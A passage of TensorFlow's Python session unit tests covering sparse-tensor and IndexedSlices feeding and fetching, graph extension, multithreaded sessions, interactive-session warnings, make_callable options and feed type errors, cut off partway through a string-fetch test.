self.assertAllEqual(sp_out[0][0][0].indices, indices) self.assertAllEqual(sp_out[0][0][0].values, values) self.assertAllEqual(sp_out[0][0][0].dense_shape, shape) self.assertAllEqual(sp_out[1].indices, indices) self.assertAllEqual(sp_out[1].values, values) self.assertAllEqual(sp_out[1].dense_shape, shape) def testFeedSparseTensor(self): with session.Session() as s: indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) values = np.array([1.0, 2.0]).astype(np.float32) shape = np.array([7, 9, 2]).astype(np.int64) sp = sparse_tensor.SparseTensor( array_ops.placeholder(dtype=np.int64, shape=(2, 3)), array_ops.placeholder(dtype=np.float32, shape=(2,)), array_ops.placeholder(dtype=np.int64, shape=(3,)), ) sp_indices = array_ops.identity(sp.indices) sp_values = array_ops.identity(sp.values) sp_shape = array_ops.identity(sp.dense_shape) sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape) # Feed with tuple indices_out, values_out, shape_out = s.run( [sp_indices, sp_values, sp_shape], { sp: (indices, values, shape) }) self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # Feed with tuple, fetch sp directly sp_out = s.run(sp, {sp: (indices, values, shape)}) 
self.assertAllEqual(sp_out.indices, indices) self.assertAllEqual(sp_out.values, values) self.assertAllEqual(sp_out.dense_shape, shape) # Feed with SparseTensorValue indices_out, values_out, shape_out = s.run( [sp_indices, sp_values, sp_shape], { sp: sparse_tensor.SparseTensorValue(indices, values, shape) }) self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # Feed with SparseTensorValue, fetch SparseTensorValue sp2_out = s.run(sp2, { sp: sparse_tensor.SparseTensorValue(indices, values, shape) }) self.assertAllEqual(sp2_out.indices, indices) self.assertAllEqual(sp2_out.values, values) self.assertAllEqual(sp2_out.dense_shape, shape) # Feed SparseTensorValue and fetch sp directly. sp_out = s.run(sp, { sp: sparse_tensor.SparseTensorValue(indices, values, shape) }) self.assertAllEqual(sp_out.indices, indices) self.assertAllEqual(sp_out.values, values) self.assertAllEqual(sp_out.dense_shape, shape) def testFeedSparsePlaceholder(self): with session.Session() as s: indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) values = np.array([1.0, 2.0]).astype(np.float32) shape = np.array([7, 9, 2]).astype(np.int64) sp = array_ops.sparse_placeholder(dtype=np.float32, name='placeholder1') sp_indices = array_ops.identity(sp.indices) sp_values = array_ops.identity(sp.values) sp_shape = array_ops.identity(sp.dense_shape) sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape) # Feed with tuple indices_out, values_out, shape_out = s.run( [sp_indices, sp_values, sp_shape], { sp: (indices, values, shape) }) self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # Feed with SparseTensorValue indices_out, values_out, shape_out = s.run( [sp_indices, sp_values, sp_shape], { sp: sparse_tensor.SparseTensorValue(indices, values, shape) }) self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # Feed with SparseTensorValue, fetch SparseTensorValue sp2_out = s.run(sp2, { sp: sparse_tensor.SparseTensorValue(indices, values, shape) }) self.assertAllEqual(sp2_out.indices, indices) self.assertAllEqual(sp2_out.values, values) self.assertAllEqual(sp2_out.dense_shape, shape) def testFeedSparsePlaceholderPartialShape(self): with session.Session() as s: indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) values = np.array([1.0, 2.0]).astype(np.float32) shape = np.array([7, 9, 2]).astype(np.int64) sp = array_ops.sparse_placeholder( shape=[None, 9, 2], dtype=np.float32, name='placeholder1') sp_indices = array_ops.identity(sp.indices) sp_values = array_ops.identity(sp.values) sp_shape = array_ops.identity(sp.dense_shape) sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape) # Feed with tuple indices_out, values_out, shape_out = s.run( [sp_indices, sp_values, sp_shape], { sp: (indices, values, shape) }) self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # Feed with SparseTensorValue indices_out, values_out, shape_out = s.run( [sp_indices, sp_values, sp_shape], { sp: sparse_tensor.SparseTensorValue(indices, values, shape) }) self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # Feed with SparseTensorValue, fetch SparseTensorValue sp2_out = s.run(sp2, { sp: sparse_tensor.SparseTensorValue(indices, values, shape) }) self.assertAllEqual(sp2_out.indices, indices) 
self.assertAllEqual(sp2_out.values, values) self.assertAllEqual(sp2_out.dense_shape, shape) def testFeedSparsePlaceholderConstantShape(self): with session.Session() as s: indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) values = np.array([1.0, 2.0]).astype(np.float32) shape = np.array([7, 9, 2]).astype(np.int64) sp = array_ops.sparse_placeholder( dtype=np.float32, shape=shape, name='placeholder1') self.assertAllEqual(sp.dense_shape.eval(session=s), shape) self.assertAllEqual(tensor_util.constant_value(sp.dense_shape), shape) sp_indices = array_ops.identity(sp.indices) sp_values = array_ops.identity(sp.values) sp_shape = array_ops.identity(sp.dense_shape) # Feed with tuple indices_out, values_out, shape_out = s.run( [sp_indices, sp_values, sp_shape], { sp: (indices, values) }) self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) def testFetchIndexedSlices(self): with session.Session() as s: indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) values = np.array([1.0, 2.0]).astype(np.float32) dense_shape = np.array([7, 9, 2]).astype(np.int64) ind = ops.IndexedSlices( constant_op.constant(values), constant_op.constant(indices), constant_op.constant(dense_shape)) # Single fetch, use as tuple ind_out = s.run(ind) values_out, indices_out, dense_shape_out = ind_out self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # Single fetch, use as IndexedSlicesValue ind_out = s.run(ind) self.assertAllEqual(ind_out.values, values) self.assertAllEqual(ind_out.indices, indices) self.assertAllEqual(ind_out.dense_shape, dense_shape) # Tuple fetch, use as tuple values_out, indices_out, dense_shape_out = s.run(ind) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # List fetch, use as tuple (values_out, indices_out, dense_shape_out), = s.run([ind]) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # List fetch, use as IndexedSlicesValue ind_out, = s.run([ind]) self.assertAllEqual(ind_out.values, values) self.assertAllEqual(ind_out.indices, indices) self.assertAllEqual(ind_out.dense_shape, dense_shape) def testFeedIndexedSlices(self): with session.Session() as s: values = np.array([1.0, 2.0]).astype(np.float32) indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) dense_shape = np.array([7, 9, 2]).astype(np.int64) ind = ops.IndexedSlices( array_ops.placeholder(dtype=np.float32, shape=(2,)), array_ops.placeholder(dtype=np.int64, shape=(2, 3)), array_ops.placeholder(dtype=np.int64, shape=(3,)), ) ind_values = array_ops.identity(ind.values) ind_indices = array_ops.identity(ind.indices) ind_dense_shape = array_ops.identity(ind.dense_shape) ind2 = ops.IndexedSlices(ind_values, ind_indices, ind_dense_shape) # Feed with tuple values_out, indices_out, dense_shape_out = s.run( [ind_values, ind_indices, ind_dense_shape], { ind: (values, indices, dense_shape) }) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # Feed with IndexedSlicesValue values_out, indices_out, dense_shape_out = s.run( [ind_values, ind_indices, ind_dense_shape], { ind: ops.IndexedSlicesValue(values, indices, dense_shape) }) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, 
dense_shape) # Feed with IndexedSlicesValue, fetch IndexedSlicesValue ind2_out = s.run(ind2, { ind: ops.IndexedSlicesValue(values, indices, dense_shape) }) self.assertAllEqual(ind2_out.values, values) self.assertAllEqual(ind2_out.indices, indices) self.assertAllEqual(ind2_out.dense_shape, dense_shape) def testFetchIndexedSlicesWithoutDenseShape(self): with session.Session() as s: indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) values = np.array([1.0, 2.0]).astype(np.float32) dense_shape = None ind = ops.IndexedSlices( constant_op.constant(values), constant_op.constant(indices), None) # Single fetch, use as tuple ind_out = s.run(ind) values_out, indices_out, dense_shape_out = ind_out self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # Single fetch, use as IndexedSlicesValue ind_out = s.run(ind) self.assertAllEqual(ind_out.values, values) self.assertAllEqual(ind_out.indices, indices) self.assertAllEqual(ind_out.dense_shape, dense_shape) # Tuple fetch, use as tuple values_out, indices_out, dense_shape_out = s.run(ind) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # List fetch, use as tuple (values_out, indices_out, dense_shape_out), = s.run([ind]) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # List fetch, use as IndexedSlicesValue ind_out, = s.run([ind]) self.assertAllEqual(ind_out.values, values) self.assertAllEqual(ind_out.indices, indices) self.assertAllEqual(ind_out.dense_shape, dense_shape) def testFeedIndexedSlicesWithoutDenseShape(self): with session.Session() as s: values = np.array([1.0, 2.0]).astype(np.float32) indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) dense_shape = None ind = ops.IndexedSlices( array_ops.placeholder(dtype=np.float32, shape=(2,)), array_ops.placeholder(dtype=np.int64, shape=(2, 3)), None) ind_values = array_ops.identity(ind.values) ind_indices = array_ops.identity(ind.indices) ind2 = ops.IndexedSlices(ind_values, ind_indices) # Feed with tuple values_out, indices_out = s.run([ind_values, ind_indices], { ind: (values, indices) }) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) # Feed with IndexedSlicesValue values_out, indices_out = s.run([ind_values, ind_indices], { ind: ops.IndexedSlicesValue(values, indices, dense_shape) }) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) # Feed with IndexedSlicesValue, fetch IndexedSlicesValue ind2_out = s.run(ind2, { ind: ops.IndexedSlicesValue(values, indices, dense_shape) }) self.assertAllEqual(ind2_out.values, values) self.assertAllEqual(ind2_out.indices, indices) self.assertAllEqual(ind2_out.dense_shape, dense_shape) def testExtendWithStatelessOperations(self): with session.Session() as s: a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[2, 3]) c = math_ops.matmul(a, b) c_val = s.run(c) self.assertAllEqual([[4.0, 4.0, 4.0]], c_val) d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1]) e = math_ops.matmul(c, d) # Extend will happen here. 
      e_val = s.run(e)
      self.assertAllEqual([[24.0]], e_val)

  def testExtendWithStatefulOperations(self):
    with session.Session() as s:
      a = constant_op.constant(1.0, shape=[1, 2])
      b = constant_op.constant(2.0, shape=[2, 3])
      c = math_ops.matmul(a, b)
      v = variables.Variable(c, name='testExtendWithStatefulOperations_v')
      v.initializer.run()
      v_val = v.eval()
      self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
      d = constant_op.constant(3.0, shape=[2, 3])
      e = math_ops.matmul(a, d)
      assign_e_to_v = state_ops.assign(v, e)
      # Extend will happen here.
      e_val = e.eval()
      self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
      v_val = v.eval()
      self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
      s.run(assign_e_to_v)
      v_val = v.eval()
      self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)

  def testExtendWithGroupBy(self):
    with session.Session() as s:
      a = constant_op.constant(1.0, shape=[1, 2])
      p = variables.Variable(a, name='testExtendWithGroupBy_p')
      a_val = a.eval()  # Force an Extend after this op.
      self.assertAllEqual([[1.0, 1.0]], a_val)

      b = constant_op.constant(2.0, shape=[1, 2])
      q = variables.Variable(b, name='testExtendWithGroupBy_q')
      # Extend will happen here.
      init = control_flow_ops.group(p.initializer, q.initializer)
      s.run(init)
      p_val, q_val = s.run([p, q])

      self.assertAllEqual([[1.0, 1.0]], p_val)
      self.assertAllEqual([[2.0, 2.0]], q_val)

  def testTensorGetMethod(self):
    with session.Session():
      a = constant_op.constant(1.0, shape=[1, 2])
      b = constant_op.constant(2.0, shape=[2, 3])
      c = math_ops.matmul(a, b)

      c_val = c.eval()
      self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)

      fed_c_val = c.eval(feed_dict={a.name: [[4.0, 4.0]]})
      self.assertAllEqual([[16.0, 16.0, 16.0]], fed_c_val)

  @test_util.run_v1_only('b/120545219')
  def testOperationRunMethod(self):
    with session.Session():
      a = constant_op.constant(1.0, shape=[1, 2])
      b = constant_op.constant(2.0, shape=[1, 2], name='b')
      v = variables.VariableV1(a, a.dtype)
      assign_a_to_v = state_ops.assign(v, a)

      assign_a_to_v.eval()

      v_val = v.eval()
      self.assertAllEqual([[1.0, 1.0]], v_val)

      assign_b_to_v = state_ops.assign(v, b)

      assign_b_to_v.eval()
      v_val = v.eval()
      self.assertAllEqual([[2.0, 2.0]], v_val)

      assign_b_to_v.eval(feed_dict={'b:0': [[3.0, 3.0]]})
      v_val = v.eval()
      self.assertAllEqual([[3.0, 3.0]], v_val)

  def testDefaultGraph(self):
    with session.Session() as s:
      self.assertEqual(ops.get_default_graph(), s.graph)
      a = constant_op.constant(1.0, shape=[1, 2])
      b = constant_op.constant(2.0, shape=[2, 3])
      self.assertEqual(ops.get_default_graph(), a.graph)
      self.assertEqual(ops.get_default_graph(), b.graph)
      c = math_ops.matmul(a, b)
      v = variables.Variable(c, name='testDefaultGraph_v')
      v.initializer.run()
      v_val = v.eval()
      self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
      d = constant_op.constant(3.0, shape=[2, 3])
      e = math_ops.matmul(a, d)
      assign_e_to_v = state_ops.assign(v, e)
      e_val = e.eval()
      self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
      v_val = v.eval()
      self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
      s.run(assign_e_to_v)
      v_val = v.eval()
      self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
      self.assertEqual(ops.get_default_graph(), s.graph)

  def _testDefaultGraphInThread(self, constructed_event, continue_event, i):
    with session.Session() as s:
      self.assertEqual(ops.get_default_graph(), s.graph)
      a = constant_op.constant(1.0, shape=[1, 2])
      b = constant_op.constant(2.0, shape=[2, 3])
      c = math_ops.matmul(a, b)
      v = variables.Variable(c, name='var_%d' % i)

      # Block here until all threads have constructed their graph.
      constructed_event.set()
      continue_event.wait()

      assign_c_to_v = state_ops.assign(v, c)
      v.initializer.run()
      assign_c_to_v.eval()
      v_val = v.eval()
      self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
      d = constant_op.constant(3.0, shape=[2, 3])
      e = math_ops.matmul(a, d)
      assign_e_to_v = state_ops.assign(v, e)
      e_val = e.eval()
      self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
      v_val = v.eval()
      self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
      s.run(assign_e_to_v)
      v_val = v.eval()
      self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
      self.assertEqual(ops.get_default_graph(), s.graph)

  def testDefaultGraphWithThreads(self):
    # Fork ten threads that use their thread-local default graph.
    threads = []
    constructed_events = [threading.Event() for _ in range(10)]
    continue_event = threading.Event()
    for i, constructed_event in enumerate(constructed_events):
      t = self.checkedThread(
          target=self._testDefaultGraphInThread,
          args=(constructed_event, continue_event, i))
      threads.append(t)
    for t in threads:
      t.start()
    for constructed_event in constructed_events:
      constructed_event.wait()
    continue_event.set()
    for t in threads:
      t.join()

  def testParallelRun(self):
    with session.Session() as sess:
      c = constant_op.constant(5.0)
      ev = threading.Event()

      def run_step():
        ev.wait()
        val = c.eval(session=sess)
        self.assertEqual(val, 5.0)

      threads = [self.checkedThread(target=run_step) for _ in range(100)]
      for t in threads:
        t.start()
      ev.set()
      for t in threads:
        t.join()

  @staticmethod
  def _build_graph():
    time.sleep(random.random() * 0.1)
    # Do some graph construction. Try to exercise non-trivial paths.
    graph = ops.get_default_graph()
    gdef = None
    for _ in range(10):
      x = array_ops.placeholder(dtype=dtypes.float32)
      with ops.colocate_with(x):
        y = array_ops.placeholder(dtype=dtypes.float32)
      with ops.device('/cpu:0'):
        z = control_flow_ops.while_loop(
            lambda x, y: x < 10, lambda x, y: (x + 1, x * y), [x, y])
      with graph._attr_scope({'_a': attr_value_pb2.AttrValue(b=False)}):
        gradients_impl.gradients(z, [x, y])
      if gdef is None:
        gdef = graph.as_graph_def()
      else:
        importer.import_graph_def(gdef, name='import')

  @test_util.run_v1_only('b/120545219')
  def testParallelRunAndSingleBuild(self):
    with session.Session() as sess:
      c = constant_op.constant(5.0)
      stop = threading.Event()

      def run_loop():
        while not stop.is_set():
          time.sleep(random.random() * 0.1)
          self.assertEqual(sess.run(c), 5.0)

      threads = [self.checkedThread(target=run_loop) for _ in range(10)]
      for t in threads:
        t.start()

      SessionTest._build_graph()
      stop.set()
      for t in threads:
        t.join()

  @test_util.run_v1_only('b/120545219')
  def testParallelRunAndParallelBuild(self):
    with session.Session() as sess:
      c = constant_op.constant(5.0)
      stop = threading.Event()

      def run_loop():
        while not stop.is_set():
          time.sleep(random.random() * 0.1)
          self.assertEqual(sess.run(c), 5.0)

      run_threads = [self.checkedThread(target=run_loop) for _ in range(10)]
      for t in run_threads:
        t.start()

      build_threads = [self.checkedThread(target=SessionTest._build_graph)
                       for _ in range(10)]
      for t in build_threads:
        t.start()
      for t in build_threads:
        t.join()

      # Let the run_threads run until the build threads are finished.
      stop.set()
      for t in run_threads:
        t.join()

  def testRunFeedDict(self):
    with session.Session() as s:
      x = array_ops.zeros([2])

      y = s.run(2 * x, feed_dict={x: np.ones(2).astype(np.float32)})
      self.assertAllEqual(y, 2 * np.ones(2))

      y = s.run(2 * x, feed_dict={x.name: np.ones(2).astype(np.float32)})
      self.assertAllEqual(y, 2 * np.ones(2))

      y = s.run(2 * x, feed_dict={x: [1, 1]})
      assert (y == 2 * np.ones(2)).all()

      # Test nested tuple keys
      z = (((array_ops.zeros([2]),),), array_ops.zeros([2]),
           (array_ops.zeros([2]),))
      result = [z[0][0][0] * 2, z[1] * 2, z[2][0] * 2]
      values = (((np.array([1, 1]),),), np.array([2, 2]), (np.array([3, 3]),))
      result_value = s.run(result, feed_dict={z: values})
      self.assertAllEqual(result_value[0], 2 * np.ones(2))
      self.assertAllEqual(result_value[1], 2 * np.array([2, 2]))
      self.assertAllEqual(result_value[2], 2 * np.array([3, 3]))

  def testGraphDef(self):
    with session.Session() as sess:
      self.assertProtoEquals('versions { producer: %d min_consumer: %d }' %
                             (versions.GRAPH_DEF_VERSION,
                              versions.GRAPH_DEF_VERSION_MIN_CONSUMER),
                             sess.graph_def)
      c = constant_op.constant(5.0, name='c')
      self.assertEqual(len(sess.graph_def.node), 1)
      d = constant_op.constant(6.0, name='d')
      self.assertEqual(len(sess.graph_def.node), 2)
      self.assertAllEqual(c.eval(), 5.0)
      self.assertAllEqual(d.eval(), 6.0)
      e = constant_op.constant(7.0, name='e')
      self.assertEqual(len(sess.graph_def.node), 3)
      self.assertAllEqual(e.eval(), 7.0)

  def testUseAfterClose(self):
    with session.Session() as sess:
      c = constant_op.constant(5.0)
      self.assertAllEqual(sess.run(c), 5.0)
    with self.assertRaisesWithPredicateMatch(
        RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)):
      sess.run(c)

  def testUseAfterCloseConcurrent(self):
    with session.Session() as sess:
      c = constant_op.constant(5.0)
      self.assertAllEqual(sess.run(c), 5.0)

      def update_thread():
        with self.assertRaisesWithPredicateMatch(
            RuntimeError,
            lambda e: 'Attempted to use a closed Session.' in str(e)):
          while True:
            sess.run(c)

      t = threading.Thread(target=update_thread)
      t.start()
      time.sleep(0.1)
      sess.close()
      t.join()

  def testUseEmptyGraph(self):
    with session.Session() as sess:
      with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'):
        sess.run([])
      with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'):
        sess.run(())
      with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'):
        sess.run({})

  @test_util.run_v1_only('b/120545219')
  def testNotEntered(self):
    # pylint: disable=protected-access
    self.assertEqual(ops._default_session_stack.get_default(), None)
    # pylint: enable=protected-access
    with ops.device('/cpu:0'):
      sess = session.Session()
      c_1 = constant_op.constant(5.0)
      with sess.graph.as_default():
        c_2 = constant_op.constant(5.0)
      self.assertEqual(c_1.graph, c_2.graph)
      self.assertEqual(sess.run(c_2), 5.0)
      with self.assertRaisesWithPredicateMatch(
          ValueError, lambda e: 'No default session is registered.' in str(e)):
        c_2.eval()

  @test_util.run_v1_only('b/120545219')
  def testInteractive(self):
    with ops.device('/cpu:0'):
      sess = session.InteractiveSession()
      a = constant_op.constant(1.0, shape=[1, 2])
      b = constant_op.constant(2.0, shape=[2, 3])
      c = math_ops.matmul(a, b)
      self.assertAllEqual([[4.0, 4.0, 4.0]], c.eval())
      d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
      e = math_ops.matmul(c, d)
      self.assertAllEqual([[24.0]], e.eval())
      sess.close()

  @test_util.run_v1_only('b/120545219')
  def testMultipleInteractiveSessionsWarning(self):
    # Reinitialize the global state to ensure that the expected warnings will
    # be emitted.
    session.InteractiveSession._active_session_count = 0  # pylint: disable=protected-access

    sess = session.InteractiveSession()
    sess.run(constant_op.constant(4.0))  # Run so that the session is "opened".
    sess.close()
    # Opening and closing interactive sessions serially should not warn.
    with warnings.catch_warnings(record=True) as w:
      sess = session.InteractiveSession()
      sess.close()
    self.assertEqual(0, len(w))

    with warnings.catch_warnings(record=True) as w:
      sess = session.InteractiveSession()
    self.assertEqual(0, len(w))
    with warnings.catch_warnings(record=True) as w:
      sess2 = session.InteractiveSession()
    self.assertEqual(1, len(w))
    self.assertTrue('An interactive session is already active. This can cause '
                    'out-of-memory errors in some cases. You must explicitly '
                    'call `InteractiveSession.close()` to release resources '
                    'held by the other session(s).' in str(w[0].message))
    sess2.close()
    sess.close()

  @test_util.run_v1_only('b/120545219')
  def testInteractivePlacePrunedGraph(self):
    sess = session.InteractiveSession()

    # Build a graph that has a bad op in it (no kernel).
    #
    # This test currently does not link in any GPU kernels,
    # which is why placing this is invalid. If at some point
    # GPU kernels are added to this test, some other different
    # op / device combo should be chosen.
    with ops.device('/device:GPU:0'):
      a = constant_op.constant(1.0, shape=[1, 2])

    b = constant_op.constant(1.0, shape=[1, 2])

    # Only run the valid op, this should work.
    b.eval()

    with self.assertRaises(errors.InvalidArgumentError):
      a.eval()
    sess.close()

  @test_util.run_v1_only('b/120545219')
  def testDefaultSessionPlacePrunedGraph(self):
    sess = session.Session()

    # Build a graph that has a bad op in it (no kernel).
    #
    # This test currently does not link in any GPU kernels,
    # which is why placing this is invalid. If at some point
    # GPU kernels are added to this test, some other different
    # op / device combo should be chosen.
    with ops.device('/device:GPU:0'):
      _ = constant_op.constant(1.0, shape=[1, 2])

    b = constant_op.constant(1.0, shape=[1, 2])

    with self.assertRaises(errors.InvalidArgumentError):
      # Even though we don't run the bad op, we place the entire
      # graph, which should fail with a non-interactive session.
      sess.run(b)

    sess.close()

  def testSharedGraph(self):
    with ops.Graph().as_default() as g, ops.device('/cpu:0'):
      a = constant_op.constant(1.0, shape=[1, 2])
      b = constant_op.constant(2.0, shape=[2, 3])
      c = math_ops.matmul(a, b)

    with session.Session(graph=g) as sess1:
      with session.Session(graph=g) as sess2:
        self.assertAllEqual(sess1.run(c), sess2.run(c))

  def testDuplicatedInputs(self):
    with session.Session() as sess:
      a = constant_op.constant(1.0, shape=[1, 2])
      b = constant_op.constant(2.0, shape=[1, 3])
      a_val, b_val, a2_val = sess.run([a, b, a])
      self.assertAllEqual(a_val, [[1.0, 1.0]])
      self.assertAllEqual(b_val, [[2.0, 2.0, 2.0]])
      self.assertAllEqual(a2_val, [[1.0, 1.0]])

  def testFeedAndFetch(self):
    with session.Session() as sess:
      for dtype in [
          dtypes.float16, dtypes.float32, dtypes.float64, dtypes.int32,
          dtypes.uint8, dtypes.int16, dtypes.int8, dtypes.int64, dtypes.bool,
          dtypes.complex64, dtypes.complex128
      ]:
        for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
          np_dtype = dtype.as_numpy_dtype

          feed_t = array_ops.placeholder(dtype=dtype, shape=shape)
          out_t = array_ops.identity(feed_t)

          np_array = np.random.randint(-10, 10, shape)

          if dtype == dtypes.bool:
            np_array = np_array > 0
          elif dtype == dtypes.complex64:
            np_array = np.sqrt(np_array.astype(np_dtype))
          elif dtype == dtypes.complex128:
            np_array = np.sqrt(np_array.astype(np_dtype))
          else:
            np_array = np_array.astype(np_dtype)

          self.assertAllEqual(np_array,
                              sess.run(out_t, feed_dict={
                                  feed_t: np_array
                              }))
          # Check that we can also get the feed back.
          self.assertAllEqual(np_array,
                              sess.run(feed_t, feed_dict={
                                  feed_t: np_array
                              }))
          # Also check that we can get both back.
          out_v, feed_v = sess.run(
              [out_t, feed_t], feed_dict={
                  feed_t: np_array
              })
          self.assertAllEqual(np_array, out_v)
          self.assertAllEqual(np_array, feed_v)

          feed_fetch_runner = sess.make_callable([out_t, feed_t], [feed_t])
          out_v, feed_v = feed_fetch_runner(np_array)
          self.assertAllEqual(np_array, out_v)
          self.assertAllEqual(np_array, feed_v)

  def testMakeCallableOnTensorWithRunOptions(self):
    with session.Session() as sess:
      a = constant_op.constant(42.0)
      tensor_runner = sess.make_callable(a, accept_options=True)
      run_options = config_pb2.RunOptions(
          trace_level=config_pb2.RunOptions.FULL_TRACE)
      run_metadata = config_pb2.RunMetadata()
      self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
      res = tensor_runner(options=run_options, run_metadata=run_metadata)
      self.assertEqual(42.0, res)
      self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)

  def testMakeCallableOnOperationWithRunOptions(self):
    with session.Session() as sess:
      a = variables.Variable(42.0)
      b = state_ops.assign_add(a, 1.0)
      sess.run(a.initializer)
      tensor_runner = sess.make_callable(b.op, accept_options=True)
      run_options = config_pb2.RunOptions(
          trace_level=config_pb2.RunOptions.FULL_TRACE)
      run_metadata = config_pb2.RunMetadata()
      self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
      tensor_runner(options=run_options, run_metadata=run_metadata)
      self.assertEqual(43.0, sess.run(a))
      self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)

  def testMakeCallableWithFeedListAndRunOptions(self):
    with session.Session() as sess:
      ph = array_ops.placeholder(dtypes.float32)
      a = math_ops.add(ph, 1.0)
      tensor_runner = sess.make_callable(
          a, feed_list=[ph.name], accept_options=True)
      run_options = config_pb2.RunOptions(
          trace_level=config_pb2.RunOptions.FULL_TRACE)
      run_metadata = config_pb2.RunMetadata()
      self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
      self.assertAllClose(42.0,
                          tensor_runner(
                              41.0,
                              options=run_options,
                              run_metadata=run_metadata))
      self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)

  def testOptimizedMakeCallable(self):
    with session.Session() as sess:
      ph = array_ops.placeholder(dtypes.float32)
      a = math_ops.add(ph, 1.0)
      callable_opts = config_pb2.CallableOptions()
      callable_opts.feed.append(ph.name)
      callable_opts.fetch.append(a.name)
      for _ in range(3):
        callable_fn = sess._make_callable_from_options(callable_opts)
        for _ in range(5):
          self.assertEqual([2.0], callable_fn(np.array(1.0, dtype=np.float32)))

  def testOptimizedMakeCallableWithRunMetadata(self):
    with session.Session() as sess:
      ph = array_ops.placeholder(dtypes.float32)
      a = math_ops.add(ph, 1.0)
      callable_opts = config_pb2.CallableOptions()
      callable_opts.feed.append(ph.name)
      callable_opts.fetch.append(a.name)
      callable_opts.run_options.trace_level = config_pb2.RunOptions.FULL_TRACE
      callable_fn = sess._make_callable_from_options(callable_opts)
      run_metadata = config_pb2.RunMetadata()
      self.assertEqual([2.0], callable_fn(np.array(1.0, dtype=np.float32),
                                          run_metadata=run_metadata))
      self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)

  def testFeedError(self):
    with session.Session() as sess:
      feed_t = array_ops.placeholder(dtype=dtypes.float32)
      out_t = array_ops.identity(feed_t)
      feed_val = constant_op.constant(5.0)
      with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
        sess.run(out_t, feed_dict={feed_t: feed_val})
      with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
        out_t.eval(feed_dict={feed_t: feed_val})
      with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
        out_t.op.run(feed_dict={feed_t: feed_val})

  def testFeedPrecisionLossError(self):
    with session.Session() as sess:
      largest_int64 = np.iinfo(np.int64).max

      feed_int_implicit_int32 = constant_op.constant(1)
      feed_int_explicit_int32 = constant_op.constant(1, dtype=dtypes.int32)

      out_t = constant_op.constant(1.0)

      with self.assertRaisesRegexp(TypeError,
                                   'is not compatible with Tensor type'):
        sess.run(out_t, feed_dict={feed_int_implicit_int32: largest_int64})
      with self.assertRaisesRegexp(TypeError,
                                   'is not compatible with Tensor type'):
        sess.run(out_t, feed_dict={feed_int_explicit_int32: largest_int64})

  def testStringFetch(self):
    with session.Session():
      for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
        size = 1
        for s in shape:
          size *= s
        c_list = np.array(
            [compat.as_bytes(str(i)) for i in xrange(size)],
